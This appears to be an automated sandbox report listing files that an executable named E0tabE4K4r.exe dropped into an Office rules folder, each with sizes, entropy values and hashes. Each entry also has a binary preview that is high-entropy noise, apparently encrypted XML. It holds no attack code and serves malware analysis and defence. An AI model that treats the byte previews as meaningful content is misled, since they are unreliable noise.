                                                                                                                                                  Preview:<?xml..B..X.J.5....g...<./..A...8"....2.i....a.i..4...uU..C....s.#......q6..o.^v..Z....+.Gx[..h.d....B&Ec..x.j..N~.h....JI.A.r.s.....[T.G/..ve.'...2?-.....z.0.].....1.$..s}2f.0....r.........J..c....`.|,.w..k...m#....S.._...U......|.y&..]...2+.._.rtvm...8,].vj..|....8..8....2.)%E..e..|..dY}.k.-ON9GXp.3'..&...4g.q.P...#cX...0.?.m.hB.l...d.r.o?.\.z..9Px.c.QQ.D.}...+.!.\H}..x..(].iu..oq.c)3..-4*.Kq..+.Im.)...Md..9..-.Ku+.S.R...e~S...O.s....+.6.$.V..k........TF..g..m...)..)..?\..y41.o...:.=.....n....?...d...m.._=.fu.-V..8...zuf....l.^.....;b..V..l.Pc.g.......n[#....Sz"......D......T.....2.7...!..R.C8.J......~'. ........9....~.K...?.9..fXn3%B......nJ.S)J.\..*#A.Sd..p..8f..uB..._...y.F..*...2}.1..}$8...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120639v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):756
                                                                                                                                                  Entropy (8bit):7.693390894539179
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:pNtKncGmiIBhwnnPrb9krrPXYBjyCEr7TdrswOUvFTxctEcg30VsQoiMSUdNciik:Xt5BFBmrb9kvYYprJFBcDKcT2bD
                                                                                                                                                  MD5:5EE340E03767FE9D4D6AA4570B39CED4
                                                                                                                                                  SHA1:64E43169EB2BAB0FB2AB883950CAB7D198E04CC4
                                                                                                                                                  SHA-256:1BBC8BBBC5EA278B26FBA512D2A20C9126F3309F877720533B8EAF759CAE6D02
                                                                                                                                                  SHA-512:E242D925F4FEEB4F7D0260E9CE08A943302EC785E2C23D2C86C2F76F3D5CCF3B4E1192D8892E08247890C8C537A3818BE9D734BB4A44DC9BCD796D404E78C0A3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlT....9.t.0...!.....y.s..;....:.}]...p..>.l.!.......?h\.,.....>T...i...6..T....N.Oz{...8.......Z,....QvG.,...F.jj..f...\|.s...K..D......g.d...0.cd.....`...q0.7.......z.!.B.y...6...... ..g.N.`.(g..:*T.k.....^Q.......K......d..N..Q....$..<..v...)a7.)..C.... ).H.q.T.8..9W\k..>2~?O..G.)U..*...w.\.,.$hd.+..L7?=h.$....]."$:..r.p.".../.A.t.&...f.....0~HQ.cQ....Yr.V...jN}.(.u'.....OZ..,...I..jF.'6n...w..j.8l..yb.$......._....h....F...[.'JT.D.b....B.....<h8>.y.*U..7.X...dp.N...}.tS..+.dev..we.MC.....0..BZ.T.&....+...=P...4.J......n.7..,qr..$....._..tyh.1h..r1..Q.Q.....*V.}a7[.E.P`...j....H.o.0..8{.z$.O7.Q.yh.9RJ..j.....8.MC\K....t.....PTj...~..ke..mmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120640v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):811
                                                                                                                                                  Entropy (8bit):7.7282141854509785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:y+VgxfiQgSlakVqUieVvA2l95O4y6Kn2bD:5Q7lRVEx2le4y6KkD
                                                                                                                                                  MD5:C8BE6B193C9103D8A3641C4B71F7FFAD
                                                                                                                                                  SHA1:215B80C19290FDE82DD15003466A345381FE32E1
                                                                                                                                                  SHA-256:EEF48E596EAC3EDD8B62648BF8C02DFBC158DD90B950DEB03922068BFCEF4743
                                                                                                                                                  SHA-512:BB6398230E0D79322242C52E7053CB2FBCBD05282635D7009DA95E4F6D9F93CCE49BF774936DA3F35D1EDA4E1FD400FEFD67369FDF8CEB7FC0C813BA2529514A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.A.5..szm0.`...t...>.].......x.T.ND9/.[.B..HE..#..FY..........R.".....F......T.b/k.9*.......Pd^......W.1.i.7.:.:.<.)...R.o.;.v.../o\@.+.N............p]>~._.0G._.X..@.%.s..|*.VgF...g.2qs%~..H.r...z[...ec..FNlE..G..-.x..C9..D...\.DI.M9.....T.s.j.e\...Z0.9^...0..':....dn..D.Z,L=u".%Lu.R..,.....Y..:.\/.y..2..k.<(%.....C.k}JA.....m.o....y@:..].pPD.`N.c.O.%.. .....#u....3..}%^..)<.".#T.....4...V.g..)#..@..T..s....@.AlW....+....73.{.U/,F)0R5f*../B...R\<....n....M...`.r.{...bg....4..K>O......Z..6...q...v.zNh0....~..%c;...|rz...8#....u...h..?......|.#...hA... ....NG.z.b../......&..k..N.5..2.9FgM|..D.Z.l.>c...:.i^.<...h;..x.3{.....:&Q...^...6...7....H8dv...(..R........,..4l...r..wb_.v..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120641v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):737
                                                                                                                                                  Entropy (8bit):7.7223349102075876
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8gNFGSmD9kqcR1dbSiNxcFeordcOyr50dqHExbzTmwpmynHmMRi3fR9yZCc3vAFB:8gi2qcR1dWiscrQHTmqmyHTRi3Z9yEkW
                                                                                                                                                  MD5:DE8BAA6073BF58A1670CE05909E99372
                                                                                                                                                  SHA1:202C0101B4516AA920119384ADFE6D1BBFC8748F
                                                                                                                                                  SHA-256:A3FD648E8B5E447DD57ED61C57A75BAC8857C50C5A3D64584BF9FA9ABF71F294
                                                                                                                                                  SHA-512:74FEA3B591CED02F878A3AA7CFBC878BFE76B85D257FA906DC1A5AB92631D4EB67DB13104DD0F0169D86D17279E4DB5E367885A0B85C8527810E84F83A39AC40
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.V...*.@[.o....o.....7.r .?.sr2.q...Js..#a.F..pY..dj.;sIg..=0J.w.<]..|...-......i..dC.t.X..M.).*...j.!.C..FzH.Z0/x...kCq.>.M...S..._.y.4t...$.5d;............q..+G;...H..}.'.ZS...n4.<W.%.hu.~.V$...P....AV0.Bt.|..A...^Wz.$..ckb..c.@.t|..YN.h.........W.....q..-.VMl..c....5...@.j.1.O..q..N..N.9..F9.|v....r..I..`.d]aO)....w.}......tR..B....F.....#....!...._.a...`P.zP.g:.V.*#...{...."...V....~\=......j.g...9.Q..."...e.J|..a5a|.p.P.&.8....e.#.MV?..;......-...f..T....o.C..r...."h.d....$.-!;..W......!!......9.........0,.Zq..t5.1.H..<..s.Z_.aV.2...6sU...:...0K.('i/.........#.}....%.{..QPT-.2u.e..&@....I.....6.... .N.._.ZImMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120642v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):801
                                                                                                                                                  Entropy (8bit):7.735898583512022
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:0jdhjvQ0x8HFmoI7+jLZv2lIy+MUcOUL1EK8rNOqOiLZYJuGsGs42bfuWSUdNciD:0PzGlmI38saOUpG9OiLkuH5i2bD
                                                                                                                                                  MD5:FAB95EC2A669F62B5D1FD15786F86EC6
                                                                                                                                                  SHA1:E47BDDA87AAAED0F1A245DCEE3CB83EC5EBBBFAB
                                                                                                                                                  SHA-256:C7026D1A935FBD6CCFB8A951D2EB1C29332C453740704F029D7A86FFE2D706E2
                                                                                                                                                  SHA-512:75AE6911B54641A395F13986D125CCC8C5AD4D7F32EDEA3A0FD3AFA2B40CE01D9F9E74E81B3C982FBDC105B7FA3177493D3FC730CF8F3DD794B292E6E1A5E131
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlt..._......M....#V'...X...s..,L..ok.....&.J.....vm..Ap....u.aeP..0>..........RU....VyY.<.\......LE....um~<..(..D..k.. ....(F....(M...z.$.q+..`........A......7...8n/..y....P.k..1O.....!......q=.w....^.j..T.@.wW.d.....*l..........c.~I............`..}bPa.......Y^...SgOq...5:...>.w.c...d...YJ....!Sy...D4v....c.R,.s.g.#.`FE~..(%kB.8.._....p.Hh...C;\..H..-..Y0W......jo..fe.....\GV1....C_..~.z....<.[.6...e;..l#.*..7......z&.q...a9..P)?c...(....#].k($.:q1.........6.6..r.k.q.T...>.g........m....O4..W._....j...,.v......S._..S..>.S.....q.@.Q..D.......B..aa..x..m.W...p..h.\..aw.......E......H..n2....5...mR.I.VPi......o..IF.&.sRO..a.r..t.6.....v........t.;M.&A...D.C.y.}......J".}...Q.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120643v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):733
                                                                                                                                                  Entropy (8bit):7.66864099069625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:2SVp4Pvgsr6IFfUMcy6EfBxnI3v8jUUasmpMgA/pyc3NbgKgNUDH2YJHP4M9qO9i:3p4Xgc6IpUMcrEXI3v8OsmkcN2H3ghQw
                                                                                                                                                  MD5:F5A9EDAF09B5E06FE740BA3FC2F83723
                                                                                                                                                  SHA1:5079A1544351FA93E8E24240FAF9D4818DAB9E43
                                                                                                                                                  SHA-256:F0FC3CE7235FE0D477338F7C908CC8BD40701B5D1823A49B759FC86E385190DF
                                                                                                                                                  SHA-512:3A55181021A96235542F98EEF51D27B80F55FCB29DFF9B74C3E59B6F22F18FCCEE31A4E52107BD378CA019414B253B03AA5F28C14213F376EEB156090CAA9A7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml7.......q..b.f.[w..K8.'.vJ.MS&..8.%.<.....PIaX.....S../P4z.....s..".>._..L._...MD...l...J.-.P...>.sX...W....m_M..o.||.CH..;...K.c.?t9....HsYa.p.hK.J....W..7.R.dBW.l...d.s.]g.`.........1...O8....2...~H..L.~........K..9.j.......+.lf.....c..7.....j....6.#..w8...@VB.....I,.a5E.`q..m.\...$'.B.z./...^..)!c.Oy..e....x../...CT...<.....Jw.:=........pgq>.I.....c.....'......v?..%G.hs.HP...4.......rH-..{..wl...W...}...HN..p........sV...$.t.....}d..p...;./...S.........j+$pi..h..q.r...3.CU...jo........,wM.'..c./\{u@.?XmH.Rg.J.!O...GN~.....`..2F..m.sB..C...E."..D...B.3..F...X...J...'....>_...R..k..c\.%N.......x%..Q~..mmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120644v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):812
                                                                                                                                                  Entropy (8bit):7.781390333270324
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nQUMdGGrsxRAaaroqM9YRWJpW0uJrrKgdADS04tN7dLHh8wGIBs89DhUShSSUdNX:nUyxm2SR2irKg+f43duzIBzDhUQh2bD
                                                                                                                                                  MD5:5216631A1852F31C5D8A59DA99C525EE
                                                                                                                                                  SHA1:CE2297707926A43CF34D2FCEEFF1C6A19EA09081
                                                                                                                                                  SHA-256:0BF644D83FCCF295F17273B495AB40F930A0FE06D5AB6C640E51CC21F3866EEF
                                                                                                                                                  SHA-512:B13BD044DFF4637F2DDC12C65DF4379EDB0A1B4F6F7688727DD19FEB59A0E6C57E47F0D95B809C359124A929FDDA389C7F34FB31D535375CEE470B391F35F610
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....9......x.<./B..UAI........u,.G...c ..y..._..by.....^.....I.....KMi.J..5].+.Q..,.._....h..eI..7.\...w..=...._.=;.[|]+U+b....w..\....AC.t..i....f{.~. ....~...s.....\.2".lu..tV.(x.#k...{6....G.X.H.,........K...Oer..z.....n..Y....3...`i.a1A....y..XA...L..T.X@Q..g...`..u.ag...........y.z.Z.T<...L....+..W........R;a.4$..}.'.wU8w...I.W...).u........w..:$C.l..m b`.T..j$......S<A.\.......{...3..g....M......j.'u%I..x...F=....q../U..yv..&*`.&...w...z/.......f.A.hT...l}.$......OQ.[|wX..+.C$_.b.=n..G...pZ!@.>..t..Ua&..0...\..B.{. ..;>o.~.....P(E".C....@..L..r5...5.h.Z.... gA.....a...6.:.\...7.o.m.C....rC|...|J..K..tJ.....Wa..`..!.u..Ij...3..].V#.55F...@x.A.e...9..*.(...hY).`.;[.kL_x.s.\mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120645v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):758
                                                                                                                                                  Entropy (8bit):7.633231171768696
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:2NiLg3MQtJ1M/QhQNLybzra9ndGPW3NSOSb/pN+KPQHB9hD4qeipeC8uE/i9dFSw:2Nff3So6Qbfa9yW8+KYHB9h7eipNFTow
                                                                                                                                                  MD5:181D264F503A0A59044E6A486A546C18
                                                                                                                                                  SHA1:71A1AA4A30194AFF61047445E1657E9C5CEAE7E1
                                                                                                                                                  SHA-256:B6855487CD48B5C5EF992D13FAA89E415D4E6A3113CB2CDCC81F252A9D8606FD
                                                                                                                                                  SHA-512:ADA9814125A66B4E03171045169F9A6DFB77ED38E1990B664DC5A09BD8562744F670FD888B1B746C2BC9782C5372C05151BF01EDF4649C8A98F17BABEF71BD27
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..\..Ye..GUp..Q..Z8Yn..H .....)a7.....;.^......p.f.e..b.... .1.Q..^.?4.A..D....(W.......0a...a..u#.......c.,..U...!.-(....>..^...".....4.....Ce..=W7Yw....^..AAX...1....r...e.Z..=u.....:...m....IB..$.n.n..!k..... #../`....vk.../.XR..~:ea.`...u...wn.Q.....7;..MW.A*A..'.s..WF.....k.r ..,...J.%p.p.k....1..$..AeClm.Z`mh........%...W..7..........OP~)...njr.B?..N...a.#bL.El..D$.g...o..n..l....!..$...>+_}...?..t......F..Md.'......v4...{....E.C..S.......".....W..j.4s.../B.....G...M........(e.EMYn..X.Na.n..........#.yu;.>.@H.~...\.w./..p.V......j.3.....y.U..HH....C.....1..f.Bb....x.d"..@...#..D.B.#.71...Qs......y@8.O.M.Ns.'....s.....O7%.Y{...{.:..s.^.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120646v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):808
                                                                                                                                                  Entropy (8bit):7.713350046837993
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:T/ZbGvTCqC8F2PhCK/0HpBsuIXXZ7y+2bD:Thb0TbF8R+pBcXp7SD
                                                                                                                                                  MD5:744DEAFDBAF7D83C34A87B6FA13ADDC4
                                                                                                                                                  SHA1:1D0DCD1BA63D29C1ED8E6AFF6F0C35AE21CD56D3
                                                                                                                                                  SHA-256:DD3D2BAB651551F44F621192FA603F41C389EFECCF3C2B49EFF5BB26559CD524
                                                                                                                                                  SHA-512:85BF3C47A6A1CA1CBE391321BC34C119756810F16D4E7F277A2576D3ABE35B2B42294389ED534AC47875D8E09DB07AC0027ECBFC45BDE6F0ECD039C415E1D9F9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.T.[k.(.......UxY8.S|..Q..R.cM.R./Z. ..|.C......u....Q...wr.4..*...`l+%...D.D..t...;..k{...1[p..^[4k.05z.C...|(:...8,,.c..vN.M..}?....he..z.#tA{.z3.n.@.....`Y......{g(...zw[M.{.+}".C.V[Y.E..T.y..H6..i.a:.cR..0. .9S"u...<.@..v.....e..$.....~..m.o...k....J..D3...5.....~..$.J6`...I..Q\..>.yx.......r..N....L...G.DQ.R.|.'...s........x...[..G..-. #tf..c.Ai'.5.Y|r....B..8p0.\. L0.'..Gp..(. .be...W>1..o...DZ.3.....A\o]<".G..`...&4....Eb.w...F.y.1.Y.[.....!x..=bZ.....o}...pBs.g...]z@....:~....~>O.....&.8.^o}..n"{i>.D.XY.....7``.Sx...Q.:....3..u,R.&s;.Y..q.J..6.M..GK...%....a.....|R.7%tT...Q@kU.......q...N...........B9.>..3.:.-.j........T1......w..!..T.....#z.66..N#.....'.x......zC.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120647v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):781
                                                                                                                                                  Entropy (8bit):7.722959317375767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:rMNorQ5PdXdQ6btkQ9wdDN9ThDEPXi5Y5FD9LVKOvlOf+dnmtCoSUdNcii9a:rMNj179wdlmXi+LZLUU7dmt02bD
                                                                                                                                                  MD5:D8E40B022BB0C6287E83FB8E5EA2E268
                                                                                                                                                  SHA1:A29F96AC380A6A19375982EBAE8CDBA1760DB556
                                                                                                                                                  SHA-256:9C5EAF51F927DD2187B8CF4471004A82D797732D00B274B26F7A1F0B127B0D21
                                                                                                                                                  SHA-512:5D826C7493945C057D057A3CF3BA7BE877BE68E3CF4D61250DF4BFAF33C03A638FE0898FD8A4A1DCB6E3BAD36CA892F3FFD1DC441413673C969225C832AEB13C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.A..]...Z{.\|........k.J...[...G.^.<...O?../..(.<....T...R#?H:...^._^....GG...Ta...d3p..gK.....v............0.bs!.3b...i.......9.1...I.<........:.d8L.().F.}H.I.Qu....6....6^5...:N.H......f.....x.A|w5.G..g.8.M.7x.D.......u....h..A.Faz.Z....qBP.0...eEX.1.w..71.o..g.:..6.!px.,...d.7Nb.y.w.z..Sk..`... ......k.......|..g.*.+i...l..%...^........;.. .+u.......1)..'qG....._.@...Y...+bf{.-.\...2F[...../Q......M...\...N.J.O.R../..3.Ic.......4......Y.....+.....6P.tz.i.F"o...%>;.i.lT....XF.u.4.....ZH\O...s.P....4 .MKv..7..B'.C.1.....N...]r.`..$.e*?.Z..M. ...h$<4Q<...4.=6.X..X.AR..V.....k....E...i]Qk(.GY.i..x.."....7.C.Yj.W]..;.......F.Q..x....O..{....e}_p..zkmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120648v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):824
                                                                                                                                                  Entropy (8bit):7.754570422249398
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Q+zL9KMmsSTyQLV6K/66TIBLQELaWWnx9ZkvoShD9BLtq461mDDyA3UrxnOMSUdV:jBKLsjQRR/6vLvfWxkthDp6jrxnOT2bD
                                                                                                                                                  MD5:8EF5D814BEE56880270C69DB3CE0E511
                                                                                                                                                  SHA1:4E25FA8C0918D64FAA8B580C1EB08A9272B03F4C
                                                                                                                                                  SHA-256:88B8F54A573E8188307D623209419FC746968F67E5C54DAC3E5BD89B01433AA0
                                                                                                                                                  SHA-512:36A7A04C73EA946005FE4ABD692820B6D850AD3498E2E9C3B9B7D180C95B2F1BA619769A5F030ABAD5DEDDD9E69F89B01A6D235465A1DE54617DB0647527594F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..{..W...Z*we..~.!...=@.U.t....;..........i.R.DL)(o.5.R.-VeR.p....G.#Y.d$..7|.J.h.Z..(Zj...~...I..__..)C.>.`.Z..A.....3.e..,Qd-,1...E.&.C...$........^)..,h..._o..!b..H}......x..rb....9.....C!...+J.|45.......*P.v.(.A.C.%*..g......Z....<3.I..mbNe...a.F..n...-*.uE*[.S4...r....?6......J....I..iT..{G.f....U.........S..&.P....Cf.)....>.{...p.M.\.wYX.-......\>"O.....Z.F..p.r.+_f...R....i..c34+...d".......6.7.,....R....R.E..}..[.7Y2...5.....m...?.=..xI..cl$.z].S.....Yp....1..Yr7a*...-....G.M|..w.; ...o...[.x.d.H?,.;qy..*%..Q.......B{d./..Qr7"...W9......o..c.*.OY...%.f.q.N..)P...1.'..Flx+..L!.t..4.+..Lq.~.D.....^.j#.LO.N/B..3J.4&w..?.....Go....dg:..:...&.*.....3$!...em.......e-Q.5.1;..,.Z..O...._..5mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120649v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):749
                                                                                                                                                  Entropy (8bit):7.658224086135609
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:MZdJhtF3BUTtxFcLEgYKQPj5g017j/vk0KoCENACe5YjEDt9PpaKcHWEJNqSUdNX:MZDF3QWLTYDP9b5s0tACe5YjI+KcDLpw
                                                                                                                                                  MD5:5DC6F676D5C12EF3A01F4E0976EE272A
                                                                                                                                                  SHA1:3AAB20F389749C6FC1B87D5B85699F388D808B56
                                                                                                                                                  SHA-256:B3416CFB7152442CD454F21CDE8C0FABB418A0E0236D2C2E062C447BDA81B55F
                                                                                                                                                  SHA-512:90D910DC563AC56292FA017D9BE0210C6510FF52A9A679C13D87E2B396EAF91603F9058511A15FE06C3D23878F67F52CF9C3C38A6DB33D4F81DEBDEA5A199C4B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..K...O........x.c.X'...s..'.H.(..._i.]...G'n.v"..&..d_...L..%.$..T..6l.E......yxa|..K..{./.}.p..`>>...P.....Iw/>...u......q[......bR.E<.6[c...jad.p..P{lm.WT'i+..>I....E3...=.c.C..XJ.]..YHBp]...D.=...{...{%<O.F.L.8...~...f0.h>...niH..&....RzuX..zb.D...-...Q.JU........_....w.....M.*8...zFU..n..Z;k.7..-.':..NBL.9`...:.~$....S.}..j-...).99"..*pL{1...T?1.9.k..j..(.B..L...IC..{.$....f...Z....%.>.1.Z;.RC.O[.$..~`..E.mB%.*...._:....+....@..].........-@]........dAoUx....W..B*.E..,O.7.xX....N.c.W....* lt.V-b<.rp.g..#K`=.....gh...".kU7.YA)mL*....?;.....+..=.H..o.O.B.O8...;o..1..2.qW....3k....rj.-..\"*.9.[.@..z....w.R..qp.l.*.g.S.t.uI.}lmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120650v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):812
                                                                                                                                                  Entropy (8bit):7.748277655194752
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nHi4U0dy3ITanijM7ioUVMuxGBY0lQGX2aCtL4PuwkG6PEYPYoAmaCqWSUdNciik:nH9poF4Sio2vIf+C2aSuFkG6PEYwT2bD
                                                                                                                                                  MD5:CC1DAF2CFEC0508E4FEB4915CF8AFF15
                                                                                                                                                  SHA1:DC731ED76509AE7B30F43E92C54B731CA5811376
                                                                                                                                                  SHA-256:382DD8C941CFBEE5B250DD9453605F4AB4152289486FA6B0E19DE726B8D3A9E5
                                                                                                                                                  SHA-512:4D7BF45E7FF5CC0BD94DAB29BC98E77052B8990FD43540FC6BD304B51B5E175D7FC0D936D36D661982372CD2DB7EFA00C146B0ED5A5055C1AF113F043197E06C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...hZ.{oQl..7....8.c. ...k.$f........Y.D...q...&js..s/..RNHKi..0.z...2.r.p..FX..x@.j....V....J(.<....k=3Q....Ox....a....^.?......F.w..........EY....9.h.izY..0....<:Rb..H....5.%l>].E..|.+.nS...p....#....N...?^....3Y<F._.5..K..%.'O......L.T1I..\....9...zJ.p..%..%...<.<.g.r!.g.o.m`.>S...ue.b..\7lo+C=..y7.^.G...>..Wl..n...F.......A..Wc2...u....U...tQ....u.X.>..M...Qp|....kt...}.d..(.}..{f.:.c.8|p...;6p..... ..y...+.........q.[ZL....C...}SO...k.X!.<7..u.1...cf.z/.........6@.........`....w.Q.N=B...p}.=..|.....M(.=..\.."........g&..4.Z.#tSO.Y..... ..1zT...p .gp.~?......^q..y*.Mio.w..`.C.Y3V..E2/ ...O...w.?1v~C..A....qN..h..jg.%..*6..^aA2.g....B.......%.9......2r~.....{.K....C....=l.z.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120651v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):748
                                                                                                                                                  Entropy (8bit):7.724910108711827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Zde4q6mk0SZH1N+Mmj0aoqEdx9/1JtZx5R0Sw4j2Wknj2WDSUdNcii9a:beZFM6MqQqEdztxx5SSwI7WO2bD
                                                                                                                                                  MD5:772105E8F8D8A65B6935C33094FD1230
                                                                                                                                                  SHA1:FED865AAC363CEE829E37FC83F7F470C6B90D8DD
                                                                                                                                                  SHA-256:BD36FBB89FD5D518C9AD602FF230EB1FAD6AA85CD7581A6CA1D36FD68747641E
                                                                                                                                                  SHA-512:F0213693181B9FA68AFABFBC8CFB71FB86DCEC3C126ED1FC4C2741F285E16FB31189FE402F44B0396F6AF38D6D80284CEABE95A080F56150E696F56D2CDCCA96
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......@...Q&......1l.73.......)....xJ..`$....f..L....a..%.y.}z....?/.pK.'......b.bIU.*..M..7oE0..0A.F.. ....Q........:...D!4..y...>.T.).....9cp{..a%.6.:1h..Uh.KE..\.<....}..h......?@....^.,J.,K.P}q.3.4#.j.......!WG...v.......{..2..Va>.b.%x.Vk..3..[N)..'p.*WpQ...&.|...;.{2....i^?..7..M...=m.HA...s?..E.c....L[.]...;.<..6r.^.d.(;.k......G...q.F%.=.,..5\.})f..g.i....a}j.......4L.fm...F8.....~H+...A.!.FaS.a...+.C....q.~..m..<*..pW.eZM..-...*Ze8WT.i..n.N..I....K.C~......N'...R.?.V..&4..}..*Q4...f..w.}.x9...b.nh..2.^.....y...#2...9]..a.a..B..wKY..n.}..i.yz#G...... .F..J>=.a%.55.01..,j\".....^...*..f#.(...r_s'.;..z(.-....hs.D..j.xG.q'...i...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

